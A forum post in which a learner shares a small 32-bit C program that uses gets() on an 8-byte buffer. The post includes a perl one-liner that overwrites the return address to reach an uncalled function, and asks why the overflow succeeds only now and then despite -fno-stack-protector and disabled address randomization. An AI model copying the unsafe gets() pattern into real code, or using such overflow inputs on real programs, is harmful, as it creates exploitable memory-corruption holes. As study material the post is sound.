Hello,
For learning purposes I wrote a small program that illustrates a buffer overflow.
There is nothing special in it, no shellcode, no return2libc, the only I do is to rewrite the return address and jump to another function.
Here is the code:
I am on a 32bit OS;Code:#include <stdio.h> #include <stdlib.h> void function() { printf("--------------Never called.\n"); } void f() { char string[8]; gets(string); //printf("REPEAT: %s\n", string); //printf("int a: %d, int b: %d\n", a, b); } int main() { printf("Address of function is: %08X\n", function); f(); return 0; }
I think I need to add a "16byte input" to the program and the last 4 byte is what will be the new return value.
An example run:
Here we write 8 bytes to buffer, the next 4 bytes (saved ESP), and then the last 4 bytes, the return address.Code:perl -e 'print "A" x12; print "\x24\x84\x04\x08"' | ./progi Address of function is: 08048424 --------------Never called.
My problem / question is:
The above (example) output happens rarely. About once in every ten execution.
The other times I get:
Once I get:Code:perl -e 'print "A" x12; print "\x24\x84\x04\x08"' | ./progi Address of function is: 08048424 Segmentation fault
Shouldn't the buffer overflow call the "Never called" function?Code:perl -e 'print "A" x12; print "\x24\x84\x04\x08"' | ./progi Address of function is: 08048424 Illegal instruction
I think yes, but not sure, so googled a little and no I think there may be some kind of protection.
My OS:
Debian 6, 32bit.
On the net what i found were:
1) to add -fno-stack-protector to gcc, but nothing changed.
2) "echo 0 > /proc/sys/kernel/randomize_va_space" to turn of the randomization. By default it was 2. The fact is: when turned it off, than the buffer_overflow never worked as espected. What I don't understand why.
So what do you think, should my example work as I think ("never called" function is called)? Why it happens so rarely?
Thanks!
